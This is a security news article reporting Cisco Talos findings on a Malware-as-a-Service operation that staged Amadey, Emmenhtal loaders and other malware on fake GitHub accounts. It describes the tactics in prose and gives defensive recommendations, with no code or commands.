Cisco Talos’ thorough investigation reveals a sophisticated Malware-as-a-Service (MaaS) operation that uses GitHub as an open directory to distribute malicious payloads, tools, and Amadey malware plugins.
By using the reliable developer platform, the operation circumvents traditional security measures.
In an operation identified by Cisco Talos, threat actors harnessed the Amadey malware to facilitate the delivery of a variety of secondary payloads.
The actors managed fake GitHub accounts, notably “Legendary99999”, “DFfe9ewf”, and “Milidmdds”, using these as repositories for staging malware samples, tools, and plug-ins.
Hosting malicious files on GitHub allows these campaigns to exploit organizational reliance on the platform, enabling malicious downloads to blend into legitimate traffic and bypass many security filters.
Analysis revealed a direct overlap in tactics, techniques, and procedures (TTPs) between this MaaS infrastructure and a concurrent SmokeLoader phishing campaign targeting Ukrainian entities.
Both operations utilized a variant of the multistage “Emmenhtal” loader also known as PEAKLIGHT which orchestrated the download of Amadey or other malware families such as Redline, Lumma, and AsyncRAT, from public GitHub repositories.
Multi-Stage Obfuscation
The Emmenhtal loader, extensively profiled by cybersecurity vendors, is characterized by its use of four layered obfuscations: three stages of randomized JavaScript variable encodings and embedded PowerShell, topped by a final payload decryption routine.
These loaders appeared in phishing campaigns as attachments in compressed archives, camouflaged as legitimate billing documents and invoices.
Upon execution, the JavaScript and obfuscated PowerShell layers ultimately fetched next-stage payloads from attacker-controlled infrastructure or from the aforementioned GitHub repositories.
Interestingly, this MaaS network was observed adapting its infrastructure to serve a broad clientele, distributing an array of malware families from a single set of GitHub accounts.
Repository structures consistently mirrored those found in earlier SmokeLoader incidents, further substantiating operational synergy or shared development resources between these campaigns.
By leveraging GitHub’s legitimate standing among developer communities and the inherent difficulty in blocking the platform in enterprise environments threat actors effectively weaponized trusted infrastructure to propagate malware.
The “Legendary99999” account alone hosted over 160 repositories, each containing distinct payloads, from different malware families to tools like Selenium WebDriver and even legitimate binaries such as PuTTY.
While some organizations attempt to blacklist file-sharing services, the necessity for software development teams to access GitHub creates a persistent vulnerability that is being actively exploited.
Subsequent analysis of related GitHub accounts revealed the use of sophisticated file obfuscation, creative naming conventions, and operational compartmentalization pointing to a mature criminal enterprise with MaaS offerings tailored for various customers.
Upon Amadey infection of a host, operators dynamically selected additional payloads to deploy by simply triggering downloads hosted in GitHub’s release sections.
Anomalously, certain Emmenhtal loader variants were discovered disguising themselves as MP4 files or incorporating new delivery mechanisms, such as a Python script masquerading as a cryptocurrency account enumeration tool.
Despite variations in initial dropper formats, the PowerShell routines employed to download and execute Amadey remained functionally and structurally consistent, highlighting the modularity and reuse of the attacker toolkit.
Prompt takedown of the identified GitHub accounts by the platform post-disclosure demonstrates effective collaboration between security vendors and service providers.
Nevertheless, the campaign underscores the ability of cybercriminals to rapidly adapt and weaponize public code repositories, challenging defenders to distinguish malicious access patterns amidst legitimate development activity.
As malware operators increasingly adopt MaaS models, organizations must harden network egress policies, bolster monitoring for suspicious GitHub interactions, and adopt advanced threat detection capable of recognizing multistage obfuscation and downloader activity to thwart similar attacks.
Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant updates
%20operation%20that%20uses%20GitHub%20as%20an%20open%20directory.){kind=link}